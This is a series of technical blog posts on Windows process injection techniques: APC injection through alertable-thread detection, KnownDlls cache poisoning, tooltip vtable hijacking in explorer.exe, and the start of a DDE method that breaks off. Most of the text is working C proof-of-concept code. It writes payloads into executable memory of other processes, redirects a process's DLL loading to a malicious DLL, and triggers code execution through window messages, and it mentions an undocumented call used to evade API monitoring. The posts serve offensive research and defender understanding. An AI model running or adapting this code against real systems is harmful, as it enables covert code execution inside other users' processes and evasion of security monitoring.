Unfortunately, there’s no single user-mode API to determine if a thread is alertable. From the kernel, the KTHREAD structure has an Alertable bit, but from user-mode there’s nothing similar, at least not that I’m aware of.

Method 1

This method was first described and used by Tal Liberman in a technique he invented called AtomBombing.

…create an event for each thread in the target process, then ask each thread to set its corresponding event. … wait on the event handles, until one is triggered. The thread whose corresponding event was triggered is an alertable thread.

Based on this description, we take the following steps:

  1. Enumerate threads in a target process using Thread32First and Thread32Next. OpenThread and save the handle to an array not exceeding MAXIMUM_WAIT_OBJECTS.
  2. CreateEvent for each thread and DuplicateHandle for the target process.
  3. QueueUserAPC for each thread that will execute SetEvent on the handle duplicated in step 2.
  4. WaitForMultipleObjects until one of the event handles becomes signalled.
  5. The first event signalled is from an alertable thread.

MAXIMUM_WAIT_OBJECTS is defined as 64 which might seem like a limitation, but how likely is it for processes to have more than 64 threads and not one alertable?

HANDLE find_alertable_thread1(HANDLE hp, DWORD pid) {
    DWORD         i, cnt = 0;
    HANDLE        evt[2], ss, ht, h = NULL, 
      hl[MAXIMUM_WAIT_OBJECTS],
      sh[MAXIMUM_WAIT_OBJECTS],
      th[MAXIMUM_WAIT_OBJECTS];
    THREADENTRY32 te;
    HMODULE       m;
    LPVOID        f, rm;
    
    // 1. Enumerate threads in target process
    ss = CreateToolhelp32Snapshot(
      TH32CS_SNAPTHREAD, 0);
      
    if(ss == INVALID_HANDLE_VALUE) return NULL;

    te.dwSize = sizeof(THREADENTRY32);
    
    if(Thread32First(ss, &te)) {
      do {
        // if not our target process, skip it
        if(te.th32OwnerProcessID != pid) continue;
        // if we can't open thread, skip it
        ht = OpenThread(
          THREAD_ALL_ACCESS, 
          FALSE, 
          te.th32ThreadID);
          
        if(ht == NULL) continue;
        // otherwise, add to list
        hl[cnt++] = ht;
        // if we've reached MAXIMUM_WAIT_OBJECTS. break
        if(cnt == MAXIMUM_WAIT_OBJECTS) break;
      } while(Thread32Next(ss, &te));
    }

    // Resolve address of SetEvent
    m  = GetModuleHandle(L"kernel32.dll");
    f  = GetProcAddress(m, "SetEvent");
    
    for(i=0; i<cnt; i++) {
      // 2. create event and duplicate in target process
      sh[i] = CreateEvent(NULL, FALSE, FALSE, NULL);
      
      DuplicateHandle(
        GetCurrentProcess(),  // source process
        sh[i],                // source handle to duplicate
        hp,                   // target process
        &th[i],               // target handle
        0, 
        FALSE, 
        DUPLICATE_SAME_ACCESS);
        
      // 3. Queue APC for thread passing target event handle
      QueueUserAPC(f, hl[i], (ULONG_PTR)th[i]);
    }

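    // 4. Wait for event to become signalled
    i = WaitForMultipleObjects(cnt, sh, FALSE, 1000);
    // WAIT_OBJECT_0 is zero, so any value below cnt is the index
    // of the signalled event. WAIT_TIMEOUT and WAIT_FAILED are
    // larger than cnt and must not be used as an index.
    if(i < cnt) {
      // 5. save thread handle
      h = hl[i];
    }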
    
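    // 6. Close source + target handles
    for(i=0; i<cnt; i++) {
      CloseHandle(sh[i]);
      // th[i] is only valid inside the target process, so it's
      // closed there instead of being passed to CloseHandle
      DuplicateHandle(hp, th[i], NULL, NULL, 
        0, FALSE, DUPLICATE_CLOSE_SOURCE);
      if(hl[i] != h) CloseHandle(hl[i]);
    }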
    CloseHandle(ss);
    return h;
}
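
The return value of WaitForMultipleObjects needs some care before it's used as an array index. The following is a minimal, portable sketch of that check rather than code from the PoC. The function wait_result_to_index and the K_ constants are hypothetical names introduced for illustration; their values mirror WAIT_OBJECT_0, WAIT_TIMEOUT and WAIT_FAILED from the Windows SDK.

```c
#include <assert.h>
#include <stdint.h>

// Values mirror the Windows SDK definitions. The K_ names are
// hypothetical so the sketch compiles without windows.h.
#define K_WAIT_OBJECT_0 0x00000000u
#define K_WAIT_TIMEOUT  0x00000102u
#define K_WAIT_FAILED   0xFFFFFFFFu

// Returns the index of the signalled object, or -1 if the wait
// timed out, failed or returned anything else (e.g. abandoned).
int wait_result_to_index(uint32_t result, uint32_t count) {
    assert(count <= 64);  // MAXIMUM_WAIT_OBJECTS
    
    if(result - K_WAIT_OBJECT_0 < count) {
      return (int)(result - K_WAIT_OBJECT_0);
    }
    return -1;
}
```

Both K_WAIT_TIMEOUT and K_WAIT_FAILED are larger than the maximum count of 64, so a single range check rejects them.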

Method 2

At Blackhat and Defcon 2019, Itzik Kotler and Amit Klein presented Process Injection Techniques – Gotta Catch Them All. They suggested alertable threads can be detected by simply reading the context of a remote thread and examining the control and integer registers. There’s currently no code in their pinjectra tool to perform this, so I decided to investigate how it might be implemented in practice.

If you look at the disassembly of KERNELBASE!SleepEx on Windows 10 (shown in figure 1), you can see it invokes the NT system call, NTDLL!ZwDelayExecution.

Figure 1. Disassembly of SleepEx on Windows 10.

The system call wrapper (shown in figure 2) executes a syscall instruction which transfers control from user-mode to kernel-mode. If we read the context of a thread that called KERNELBASE!SleepEx, the program counter (Rip on AMD64) should point to NTDLL!ZwDelayExecution + 0x14 which is the address of the RETN opcode.

Figure 2. Disassembly of NTDLL!ZwDelayExecution on Windows 10.

This address can be used to determine if a thread has called KERNELBASE!SleepEx. There are two ways to calculate it: add a hardcoded offset to the address returned by GetProcAddress for NTDLL!ZwDelayExecution, or read the program counter after calling KERNELBASE!SleepEx from our own artificial thread.

For the second option, a simple application was written to run a thread and call asynchronous APIs with alertable parameter set to TRUE. In between each invocation, GetThreadContext is used to read the program counter (Rip on AMD64) which will hold the return address after the system call has completed. This address can then be used in the first step of detection. Figure 3 shows output of this.

Figure 3. Win32 API and NT System Call Wrappers.

The following table matches Win32 APIs with NT system call wrappers. The parameters are included for reference.

Win32 API | NT System Call
SleepEx | ZwDelayExecution(BOOLEAN Alertable, PLARGE_INTEGER DelayInterval);
WaitForSingleObjectEx, GetOverlappedResultEx | ZwWaitForSingleObject(HANDLE Handle, BOOLEAN Alertable, PLARGE_INTEGER Timeout);
WaitForMultipleObjectsEx, WSAWaitForMultipleEvents | NtWaitForMultipleObjects(ULONG ObjectCount, PHANDLE ObjectsArray, OBJECT_WAIT_TYPE WaitType, BOOLEAN Alertable, PLARGE_INTEGER Timeout);
SignalObjectAndWait | NtSignalAndWaitForSingleObject(HANDLE SignalHandle, HANDLE WaitHandle, BOOLEAN Alertable, PLARGE_INTEGER Timeout);
MsgWaitForMultipleObjectsEx | NtUserMsgWaitForMultipleObjectsEx(ULONG ObjectCount, PHANDLE ObjectsArray, DWORD Timeout, DWORD WakeMask, DWORD Flags);
GetQueuedCompletionStatusEx | NtRemoveIoCompletionEx(HANDLE Port, FILE_IO_COMPLETION_INFORMATION *Info, ULONG Count, ULONG *Written, LARGE_INTEGER *Timeout, BOOLEAN Alertable);

The second step of detection involves reading the register that holds the Alertable parameter. NT system calls use the Microsoft fastcall convention. The first four arguments are placed in RCX, RDX, R8 and R9 with the remainder stored on the stack. Figure 4 shows the Win64 stack layout. The first index of the stack register (Rsp) will contain the return address of caller, the next four will be the shadow, spill or home space to optionally save RCX, RDX, R8 and R9. The fifth, sixth and subsequent arguments to the system call appear after this.

Figure 4. Win64 Stack Layout.
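
The stack layout described above reduces to simple arithmetic. The following is a small sketch, assuming Rsp points at the return address (as it does inside the system call wrapper). The names win64_stack_slot and win64_stack_offset are hypothetical helpers made up for this example.

```c
#include <assert.h>
#include <stddef.h>

// Index into an array of 64-bit values read from Rsp for the n-th
// argument (1-based) of a Win64 call, assuming Rsp points at the
// return address. Slot 0 is the return address and slots 1-4 are
// the home space for RCX, RDX, R8 and R9, so arguments passed on
// the stack start at slot 5.
size_t win64_stack_slot(unsigned n) {
    assert(n >= 1);
    return (size_t)n;
}

// Byte offset of the same slot from Rsp.
size_t win64_stack_offset(unsigned n) {
    return win64_stack_slot(n) * 8;
}
```

With this layout, the fifth argument (Flags for NtUserMsgWaitForMultipleObjectsEx) is in slot 5 at Rsp + 0x28 and the sixth (Alertable for NtRemoveIoCompletionEx) is in slot 6 at Rsp + 0x30.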

Based on the prototypes shown in the above table, a thread is alertable if the register or stack slot holding the Alertable parameter is TRUE or, for NtUserMsgWaitForMultipleObjectsEx, if the Flags parameter contains MWMO_ALERTABLE. The following code performs this check.

BOOL IsAlertable(HANDLE hp, HANDLE ht, LPVOID addr[6]) {
    CONTEXT   c;
    BOOL      alertable = FALSE;
    DWORD     i;
    ULONG_PTR p[8];
    SIZE_T    rd;
    
    // read the context, bail out if it can't be read
    c.ContextFlags = CONTEXT_INTEGER | CONTEXT_CONTROL;
    if(!GetThreadContext(ht, &c)) return FALSE;
    
    // for each alertable function
    for(i=0; i<6 && !alertable; i++) {
      // compare address with program counter
      if((LPVOID)c.Rip == addr[i]) {
        switch(i) {
          // ZwDelayExecution
          case 0 : {
            alertable = (c.Rcx & TRUE);
            break;
          }
          // NtWaitForSingleObject
          case 1 : {
            alertable = (c.Rdx & TRUE);
            break;
          }
          // NtWaitForMultipleObjects
          case 2 : {
            alertable = (c.Rsi & TRUE);
            break;
          }
          // NtSignalAndWaitForSingleObject
          case 3 : {
            alertable = (c.Rsi & TRUE);
            break;
          }
          // NtUserMsgWaitForMultipleObjectsEx
          case 4 : {
            // Flags is the fifth argument, stored on the stack
            if(ReadProcessMemory(hp, (LPVOID)c.Rsp, p, sizeof(p), &rd))
              alertable = (p[5] & MWMO_ALERTABLE);
            break;
          }
          // NtRemoveIoCompletionEx
          case 5 : {
            // Alertable is the sixth argument, stored on the stack
            if(ReadProcessMemory(hp, (LPVOID)c.Rsp, p, sizeof(p), &rd))
              alertable = (p[6] & TRUE);
            break;
          }            
        }
      }
    }
    return alertable;
}

You might be asking why Rsi is checked for two of the calls despite not being used for a parameter by the Microsoft fastcall convention. Rsi is a callee-saved, non-volatile register that must be preserved by any function that uses it, whereas RCX, RDX, R8 and R9 are volatile and don’t need to be preserved. It just so happens the kernel overwrites R9 for NtWaitForMultipleObjects (shown in figure 5) and R8 for NtSignalAndWaitForSingleObject (shown in figure 6), while Rsi still holds the Alertable parameter in both cases, hence the reason for checking Rsi instead. BOOLEAN is defined as an 8-bit type, so the register is masked before it’s tested for TRUE or FALSE.

Figure 5. Rsi used for Alertable Parameter to NtWaitForMultipleObjects.

Figure 6. Rsi used for Alertable parameter to NtSignalAndWaitForSingleObject.
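
To illustrate why the mask matters, here is a minimal sketch of reading an 8-bit BOOLEAN out of a 64-bit register value. The function reg_to_boolean is a hypothetical name, and it tests the whole low byte, which is a slight variation on the code above where only bit zero is tested by masking with TRUE.

```c
#include <stdint.h>

// Interpret a 64-bit register value as a BOOLEAN argument by
// looking only at the low 8 bits. The upper 56 bits are ignored
// because they may hold leftovers from earlier instructions.
int reg_to_boolean(uint64_t reg) {
    return (uint8_t)(reg & 0xFF) != 0;
}
```

Comparing the full register against TRUE without a mask would reject a value like 0x1234567800000001 even though its low byte is 1.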

The following code can support adding an offset or reading the thread context before enumerating threads.

// thread to run alertable functions
DWORD WINAPI ThreadProc(LPVOID lpParameter) {
    HANDLE           *evt = (HANDLE*)lpParameter;
    HANDLE           port;
    OVERLAPPED_ENTRY lap;
    DWORD            n;
    
    SleepEx(INFINITE, TRUE);
    
    WaitForSingleObjectEx(evt[0], INFINITE, TRUE);
    
    WaitForMultipleObjectsEx(2, evt, FALSE, INFINITE, TRUE);
    
    SignalObjectAndWait(evt[1], evt[0], INFINITE, TRUE);
    
    ResetEvent(evt[0]);
    ResetEvent(evt[1]);
    
    MsgWaitForMultipleObjectsEx(2, evt, 
      INFINITE, QS_RAWINPUT, MWMO_ALERTABLE);
      
    port = CreateIoCompletionPort(INVALID_HANDLE_VALUE, NULL, 0, 0);
    GetQueuedCompletionStatusEx(port, &lap, 1, &n, INFINITE, TRUE);
    CloseHandle(port);
    
    return 0;
}

HANDLE find_alertable_thread2(HANDLE hp, DWORD pid) {
    HANDLE        ss, ht, evt[2], h = NULL;
    LPVOID        rm, sevt, f[6];
    THREADENTRY32 te;
    SIZE_T        rd;
    DWORD         i;
    CONTEXT       c;
    ULONG_PTR     p;
    HMODULE       m;
    
    // using the offset requires less code but it may
    // not work across all systems.
#ifdef USE_OFFSET
    char *api[6]={
      "ZwDelayExecution", 
      "ZwWaitForSingleObject",
      "NtWaitForMultipleObjects",
      "NtSignalAndWaitForSingleObject",
      "NtUserMsgWaitForMultipleObjectsEx",
      "NtRemoveIoCompletionEx"};
      
    // 1. Resolve address of alertable functions
    for(i=0; i<6; i++) {
      m = GetModuleHandle(i == 4 ? L"win32u" : L"ntdll");
      f[i] = (LPBYTE)GetProcAddress(m, api[i]) + 0x14;
    }
#else
    // create thread to execute alertable functions
    evt[0] = CreateEvent(NULL, FALSE, FALSE, NULL);
    evt[1] = CreateEvent(NULL, FALSE, FALSE, NULL);
    ht     = CreateThread(NULL, 0, ThreadProc, evt, 0, NULL);
    
    // wait a moment for thread to initialize
    Sleep(100);
    
    // resolve address of SetEvent
    m      = GetModuleHandle(L"kernel32.dll");
    sevt   = GetProcAddress(m, "SetEvent");
    
    // for each alertable function
    for(i=0; i<6; i++) {
      // read the thread context
      c.ContextFlags = CONTEXT_CONTROL;
      GetThreadContext(ht, &c);
      // save address
      f[i] = (LPVOID)c.Rip;
      // queue SetEvent for next function
      QueueUserAPC(sevt, ht, (ULONG_PTR)evt);
      // wait a moment for thread to enter the next function
      Sleep(100);
    }
    // cleanup thread
    CloseHandle(ht);
    CloseHandle(evt[0]);
    CloseHandle(evt[1]);
#endif

    // Create a snapshot of threads
    ss = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
    if(ss == INVALID_HANDLE_VALUE) return NULL;
    
    // check each thread
    te.dwSize = sizeof(THREADENTRY32);
    
    if(Thread32First(ss, &te)) {
      do {
        // if not our target process, skip it
        if(te.th32OwnerProcessID != pid) continue;
        
        // if we can't open thread, skip it
        ht = OpenThread(
          THREAD_ALL_ACCESS, 
          FALSE, 
          te.th32ThreadID);
          
        if(ht == NULL) continue;
        
        // found alertable thread?
        if(IsAlertable(hp, ht, f)) {
          // save handle and exit loop
          h = ht;
          break;
        }
        // else close it and continue
        CloseHandle(ht);
      } while(Thread32Next(ss, &te));
    }
    // close snap shot
    CloseHandle(ss);
    return h;
}

Conclusion

Although both methods work fine, the first has some advantages because it doesn’t depend on any of the following. Different CPU modes/architectures (x86, AMD64, ARM64) and calling conventions (__msfastcall/__stdcall) require different ways to examine parameters. Microsoft may change how the system call wrapper functions work, in which case hardcoded offsets would point to the wrong address. Future builds may also be compiled to use another non-volatile register to hold the alertable parameter, e.g. RBX, RDI or RBP.

Injection

After the difficult part of detecting alertable threads, the rest is fairly straightforward. The two main functions used for APC injection are:

  1. QueueUserAPC
  2. NtQueueApcThread

The second is undocumented and therefore used by some threat actors to bypass API monitoring tools. Since KiUserApcDispatcher is used for APC routines, one might consider invoking it instead. The prototypes are:

NTSTATUS NtQueueApcThread(
  IN  HANDLE ThreadHandle,
  IN  PVOID ApcRoutine,
  IN  PVOID ApcRoutineContext OPTIONAL,
  IN  PVOID ApcStatusBlock OPTIONAL,
  IN  ULONG ApcReserved OPTIONAL);

VOID KiUserApcDispatcher(
  IN  PCONTEXT Context,
  IN  PVOID ApcContext,
  IN  PVOID Argument1,
  IN  PVOID Argument2,
  IN  PKNORMAL_ROUTINE ApcRoutine);

For this post, only QueueUserAPC is used.

VOID apc_inject(DWORD pid, LPVOID payload, DWORD payloadSize) {
    HANDLE hp, ht;
    SIZE_T wr;
    LPVOID cs;
    
    // 1. Open target process
    hp = OpenProcess(
      PROCESS_DUP_HANDLE | 
      PROCESS_VM_READ    | 
      PROCESS_VM_WRITE   | 
      PROCESS_VM_OPERATION, 
      FALSE, pid);
      
    if(hp == NULL) return;
    
    // 2. Find an alertable thread
    ht = find_alertable_thread1(hp, pid);

    if(ht != NULL) {
      // 3. Allocate memory
      cs = VirtualAllocEx(
        hp, 
        NULL, 
        payloadSize, 
        MEM_COMMIT | MEM_RESERVE, 
        PAGE_EXECUTE_READWRITE);
        
      if(cs != NULL) {
        // 4. Write code to memory
        if(WriteProcessMemory(
          hp, 
          cs, 
          payload, 
          payloadSize, 
          &wr)) 
        {
          // 5. Run code
          QueueUserAPC(cs, ht, 0);
        } else {
          printf("unable to write payload to process.\n");
        }
        // 6. Free memory
        VirtualFreeEx(
          hp, 
          cs, 
          0, 
          MEM_DECOMMIT | MEM_RELEASE);
      } else {
        printf("unable to allocate memory.\n");
      }
    } else {
      printf("unable to find alertable thread.\n");
    }
    // 7. Close process
    CloseHandle(hp);
}

PoC here

Windows Process Injection: KnownDlls Cache Poisoning

Introduction

This is a quick post in response to a method of injection described by James Forshaw in Bypassing CIG Through KnownDlls. The first example of poisoning the KnownDlls cache on Windows can be sourced back to a security advisory CVE-1999-0376 or MS99-066 published in February 1999. That vulnerability was discovered by Christien Rioux from the hacker group, L0pht. The PoC he released to demonstrate the attack became the basis for other projects involving DLL injection and function hooking. For example, Injection into a Process Using KnownDlls published in 2012 is heavily based on dildog’s original source code. What’s interesting about the injection method described by James is that it doesn’t read or write to virtual memory, something that’s required for almost every method of process injection known. It works by replacing a directory handle in a target process which is then used by the DLL loader to load a malicious DLL. Very clever! 🙂 Other posts related to this topic also worth reading:

If you want a closer look at the Windows Object Manager, WinObj from Microsoft is useful as is NtObjectManager.

Figure 1. KnownDlls in WinObj

Obtaining KnownDlls Directory Object Handle

As James points out, there are at least two ways to do this.

Method 1

The handle is stored in a global variable called ntdll!LdrpKnownDllDirectoryHandle (shown in figure 2) and can be found by searching the .data segment of NTDLL. Once the address is found, one can read the existing handle or overwrite it with a new one.

Figure 2. ntdll!LdrpKnownDllDirectoryHandle

The following code implements this method. NTDLL is mapped at the same base address in every process, so the address found in the local process is also valid in a remote process and there’s no need to read remote memory to locate it.

LPVOID GetKnownDllHandle(DWORD pid) {
    LPVOID                   m, va = NULL;
    PIMAGE_DOS_HEADER        dos;
    PIMAGE_NT_HEADERS        nt;
    PIMAGE_SECTION_HEADER    sh;
    DWORD                    i, cnt = 0;
    PULONG_PTR               ds = NULL;
    BYTE                     buf[1024];
    POBJECT_NAME_INFORMATION n = (POBJECT_NAME_INFORMATION)buf;

    // get base of NTDLL and pointer to section header
    m   = GetModuleHandle(L"ntdll.dll");
    dos = (PIMAGE_DOS_HEADER)m;  
    nt  = RVA2VA(PIMAGE_NT_HEADERS, m, dos->e_lfanew);  
    sh  = (PIMAGE_SECTION_HEADER)((LPBYTE)&nt->OptionalHeader + 
          nt->FileHeader.SizeOfOptionalHeader);
          
    // locate the .data segment, save VA and number of pointers
    for(i=0; i<nt->FileHeader.NumberOfSections; i++) {
      if(*(PDWORD)sh[i].Name == *(PDWORD)".data") {
        ds  = RVA2VA(PULONG_PTR, m, sh[i].VirtualAddress);
        cnt = sh[i].Misc.VirtualSize / sizeof(ULONG_PTR);
        break;
      }
    }
    // for each pointer
    for(i=0; i<cnt; i++) {
      if((LPVOID)ds[i] == NULL) continue;
      // query the object name
      // string returned? (values that aren't handles will fail)
      if(NT_SUCCESS(NtQueryObject((LPVOID)ds[i], 
           ObjectNameInformation, n, sizeof(buf), NULL)) &&
         n->Name.Length != 0) {
        // does it match ours?
        if(!lstrcmp(n->Name.Buffer, L"\\KnownDlls")) {
          // return virtual address
          va = &ds[i];
          break;
        }
      }
    }
    return va;
}
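
The section lookup above compares only the first four bytes of the name, which is enough for NTDLL but would also match a section called ".dat". As a hedged alternative, the sketch below compares all eight bytes. The section_t structure is a cut-down, hypothetical stand-in for IMAGE_SECTION_HEADER and find_section is a made-up helper, so neither is taken from the PoC.

```c
#include <stdint.h>
#include <string.h>

// Cut-down stand-in for IMAGE_SECTION_HEADER. Only the fields used
// here are kept, so this is not the real layout.
typedef struct {
    uint8_t  Name[8];        // zero padded, not always terminated
    uint32_t VirtualSize;
    uint32_t VirtualAddress;
} section_t;

// Returns the index of the section whose 8-byte name equals name,
// or -1 if there's no such section.
int find_section(const section_t *sh, int count, const char *name) {
    uint8_t key[8] = {0};
    size_t  len = strlen(name);
    int     i;

    // section names can't be longer than 8 bytes
    if(len > sizeof(key)) return -1;
    memcpy(key, name, len);

    for(i=0; i<count; i++) {
      if(memcmp(sh[i].Name, key, sizeof(key)) == 0) return i;
    }
    return -1;
}
```

Returning -1 when nothing matches also gives the caller a chance to stop before scanning an undefined range of memory.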

Method 2

The SystemHandleInformation class passed to NtQuerySystemInformation will return a list of all handles open on the system. To target a specific process, we compare the UniqueProcessId from each SYSTEM_HANDLE_TABLE_ENTRY_INFO structure with the target PID. The HandleValue is duplicated and the name is queried. This name is then compared with “\KnownDlls” and if a match is found, HandleValue is returned to the caller.

HANDLE GetKnownDllHandle2(DWORD pid, HANDLE hp) {
    ULONG                      len;
    NTSTATUS                   nts;
    LPVOID                     list=NULL;    
    DWORD                      i;
    HANDLE                     obj, h = NULL;
    PSYSTEM_HANDLE_INFORMATION hl;
    BYTE                       buf[1024];
    POBJECT_NAME_INFORMATION   name = (POBJECT_NAME_INFORMATION)buf;
    
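    // read the full list of system handles
    for(len = 8192; ;len += 8192) {
      list = malloc(len);
      if(list == NULL) return NULL;
      
      nts = NtQuerySystemInformation(
          SystemHandleInformation, list, len, NULL);
      
      // break from loop if ok    
      if(NT_SUCCESS(nts)) break;
      
      // free list and continue with a larger buffer, but give
      // up on anything other than STATUS_INFO_LENGTH_MISMATCH
      free(list);
      if(nts != (NTSTATUS)0xC0000004) return NULL;
    }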
    
    hl = (PSYSTEM_HANDLE_INFORMATION)list;

    // for each handle
    for(i=0; i<hl->NumberOfHandles && h == NULL; i++) {
      // skip these to avoid hanging process
      if((hl->Handles[i].GrantedAccess == 0x0012019f) || 
         (hl->Handles[i].GrantedAccess == 0x001a019f) || 
         (hl->Handles[i].GrantedAccess == 0x00120189) || 
         (hl->Handles[i].GrantedAccess == 0x00100000)) {
        continue;
      }

      // skip if this handle not in our target process
      if(hl->Handles[i].UniqueProcessId != pid) {
        continue;
      }
      
      // duplicate the handle object
      nts = NtDuplicateObject(
            hp, (HANDLE)hl->Handles[i].HandleValue, 
            GetCurrentProcess(), &obj, 0, FALSE, 
            DUPLICATE_SAME_ACCESS);
        
      if(NT_SUCCESS(nts)) {
        // query the name
        nts = NtQueryObject(
          obj, ObjectNameInformation, 
          name, sizeof(buf), NULL);
          
        // if name returned.. 
        if(NT_SUCCESS(nts) && name->Name.Length != 0) {
          // is it knowndlls directory?
          if(!lstrcmp(name->Name.Buffer, L"\\KnownDlls")) {
            h = (HANDLE)hl->Handles[i].HandleValue;
          }
        }
        NtClose(obj);
      }
    }
    free(list);
    return h;
}
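
The handle list is read with a buffer that grows until the query succeeds. The pattern is sketched below in portable C, assuming a hypothetical callback that reports whether the buffer was too small. The names query_fn, query_with_growing_buffer and demo_query are invented for this example and have nothing to do with the NT API.

```c
#include <stdlib.h>
#include <string.h>

// Hypothetical query callback: returns 0 on success, 1 if the
// buffer is too small and any other value for a fatal error.
typedef int (*query_fn)(void *buf, size_t len);

// Calls query with a buffer that grows by step bytes until the
// call succeeds. Returns the buffer (caller frees) or NULL if the
// query fails for another reason or max is exceeded.
void *query_with_growing_buffer(query_fn query, size_t step, size_t max) {
    size_t len;

    if(step == 0) return NULL;

    for(len = step; len <= max; len += step) {
      void *buf = malloc(len);
      int   rc;
      
      if(buf == NULL) return NULL;

      rc = query(buf, len);
      if(rc == 0) return buf;    // success

      free(buf);
      if(rc != 1) return NULL;   // not a size problem, give up
    }
    return NULL;                 // limit reached
}

// Demo callback that needs at least 20000 bytes.
int demo_query(void *buf, size_t len) {
    if(len < 20000) return 1;
    memset(buf, 0, len);
    return 0;
}
```

Stopping on any error other than "too small" and capping the size keeps the loop from spinning forever when the query can never succeed.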

Injection

The following code is purely based on the steps described in the article and in its current state will cause a target process to stop working properly. That’s why the PoC creates a process (notepad) before attempting injection rather than allowing selection of a process.

VOID knowndll_inject(DWORD pid, PWCHAR fake_dll, PWCHAR target_dll) {
    NTSTATUS          nts;
    DWORD             i;
    HANDLE            hp, hs, hf, dir, target_handle;
    OBJECT_ATTRIBUTES fa, da, sa;
    UNICODE_STRING    fn, dn, sn, ntpath;
    IO_STATUS_BLOCK   iosb;

    // open process for duplicating handle, suspending/resuming process
    hp = OpenProcess(PROCESS_DUP_HANDLE | PROCESS_SUSPEND_RESUME, FALSE, pid);
    
    // 1. Get the KnownDlls directory object handle from remote process
    target_handle = GetKnownDllHandle2(pid, hp);

    // 2. Create empty object directory, insert named section of DLL to hijack
    //    using file handle of DLL to inject    
    InitializeObjectAttributes(&da, NULL, 0, NULL, NULL);
    nts = NtCreateDirectoryObject(&dir, DIRECTORY_ALL_ACCESS, &da);
    
    // 2.1 open the fake DLL
    RtlDosPathNameToNtPathName_U(fake_dll, &fn, NULL, NULL);
    InitializeObjectAttributes(&fa, &fn, OBJ_CASE_INSENSITIVE, NULL, NULL);
      
    nts = NtOpenFile(
      &hf, FILE_GENERIC_READ | FILE_GENERIC_WRITE | FILE_GENERIC_EXECUTE,
      &fa, &iosb, FILE_SHARE_READ | FILE_SHARE_WRITE, 0);
    
    // 2.2 create named section of target DLL using fake DLL image
    RtlInitUnicodeString(&sn, target_dll);
    InitializeObjectAttributes(&sa, &sn, OBJ_CASE_INSENSITIVE, dir, NULL);
        
    nts = NtCreateSection(
      &hs, SECTION_ALL_ACCESS, &sa, 
      NULL, PAGE_EXECUTE, SEC_IMAGE, hf);
            
    // 3. Close the known DLLs handle in remote process
    NtSuspendProcess(hp);
    
    DuplicateHandle(hp, target_handle, 
      GetCurrentProcess(), NULL, 0, TRUE, DUPLICATE_CLOSE_SOURCE);
                    
    // 4. Duplicate object directory for remote process
    DuplicateHandle(
        GetCurrentProcess(), dir, hp, 
        NULL, 0, TRUE, DUPLICATE_SAME_ACCESS);
        
    NtResumeProcess(hp);
    CloseHandle(hp);
    
    printf("Select File->Open to load \"%ws\" into notepad.\n", fake_dll);
    printf("Press any key to continue...\n");
    getchar();
}

Demo

Figure 3 shows a message box displayed after the hijacked DLL (ole32.dll) is loaded.

Figure 3. Injection in notepad.

PoC here.

Windows Process Injection: Tooltip or Common Controls

Introduction

Tooltips appear automatically when the mouse pointer hovers over an element in a user interface. This helps users identify the purpose of a file, a button or menu item. Each tooltip control stores data about itself in a structure located at index zero of the Window Bytes. The first entry in the structure is a pointer to a class object called CToolTipsMgr. There are at least five methods here, three for the IUnknown interface which CToolTipsMgr inherits from and two to control the tooltip object itself. By changing the address of a method/function pointer, it’s possible to perform process injection via a window message.

Locating Controls

Figure 1 shows the properties of a tooltip control window.

Figure 1. Window properties for tooltip class.

As you can see, index zero of the window bytes is set to a value. This is the address of a heap object that contains, among other things, a pointer to a class object or virtual function table at offset zero. Figure 2 shows a partial dump of the memory in Windows Debugger while figure 3 shows the methods of the class used to control the window.

Figure 2. Heap object for window.

Figure 3. Methods of tool tip control window.

The PoC doesn’t target any specific process, but since explorer.exe will likely be the first to create a Tooltip control, it’s relatively safe to assume a window belonging to that process will be returned by a call to the FindWindow API for classes named “tooltips_class32”. You could also use the EnumWindows API to find them all and target a specific process. Figure 4 shows a list of these classes found on a 64-bit version of Windows 10.

Figure 4. List of tooltip windows found via EnumWindows.

Injection

The following code demonstrates that the injection works. The full version can be found here.

VOID comctrl_inject(LPVOID payload, DWORD payloadSize) {
    HWND         hw = 0;
    SIZE_T       rd, wr;
    LPVOID       ds, cs, p, ptr;
    HANDLE       hp;
    DWORD        pid;
    IUnknown_VFT unk;
    
    // 1. find a tool tip window.
    //    read index zero of window bytes
    hw = FindWindow(L"tooltips_class32", NULL);
    p  = (LPVOID)GetWindowLongPtr(hw, 0);
    GetWindowThreadProcessId(hw, &pid);
    
    // 2. open the process and read CToolTipsMgr
    hp = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
    if(hp == NULL) return;
    ReadProcessMemory(hp, p, &ptr, sizeof(ULONG_PTR), &rd);
    ReadProcessMemory(hp, ptr, &unk, sizeof(unk), &rd);
    
    //printf("HWND : %p Heap : %p PID : %i vftable : %p\n", 
      // hw, p, pid, ptr);
    
    // 3. allocate RWX memory and write payload there.
    //    update callback
    cs = VirtualAllocEx(hp, NULL, payloadSize, 
      MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    WriteProcessMemory(hp, cs, payload, payloadSize, &wr);
    
    // 4. allocate RW memory and write new CToolTipsMgr
    unk.AddRef = cs;
    ds = VirtualAllocEx(hp, NULL, sizeof(unk),
      MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
    WriteProcessMemory(hp, ds, &unk, sizeof(unk), &wr);
    
    // 5. update pointer, trigger execution
    WriteProcessMemory(hp, p, &ds, sizeof(ULONG_PTR), &wr);
    PostMessage(hw, WM_USER, 0, 0);

    // sleep for moment
    Sleep(1);
    
    // 6. restore original pointer and cleanup
    WriteProcessMemory(hp, p, &ptr, sizeof(ULONG_PTR), &wr);    
    VirtualFreeEx(hp, cs, 0, MEM_DECOMMIT | MEM_RELEASE);
    VirtualFreeEx(hp, ds, 0, MEM_DECOMMIT | MEM_RELEASE);
    CloseHandle(hp);
}

Summary

The PoC only works with the Tooltip class, but there are other controls that can also be used for process injection. Tab controls, progress bars, status bars, tree views, toolbars and list views are just some examples. Tooltips were used in this post because many of them are already created by explorer.exe.

Windows Process Injection: Breaking BaDDEr

Introduction

Dynamic Data Exchange (DDE) is a data sharing protocol while the Dynamic Data Exchange Management Library (DDEML) facilitates sharing of data among applications over the DDE protocol. DDE made the headlines in October 2017 after a vulnerability was discovered in Microsoft Office that could be exploited to execute code. Since then, it’s been disabled by default and is therefore not considered a critical component. The scope of this injection method is limited to explorer.exe, unless of course you know of other applications that use it. I’d like to thank Adam for the discussion about using DDE for injection and also the cheesy name. 😀

Enumerating DDE Servers

The only DLLs that use DDE servers on Windows 10 are shell32.dll, ieframe.dll and twain_32.dll. shell32.dll creates three DDE servers that are hosted by explorer.exe. The following code uses the DDEML API to list servers and the process hosting them.

VOID dde_list(VOID) {
